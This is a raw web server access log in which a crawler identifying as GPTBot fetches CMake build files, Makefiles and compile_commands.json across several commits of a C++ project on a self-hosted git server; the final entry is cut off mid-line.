"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10462] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:15:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:15:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10771] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:15:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21645] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:15:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21647] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10223] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10767] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:15:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11283] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11195] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10935] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:15:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" +[17/Feb/2026:15:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16048] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12011] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11280] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 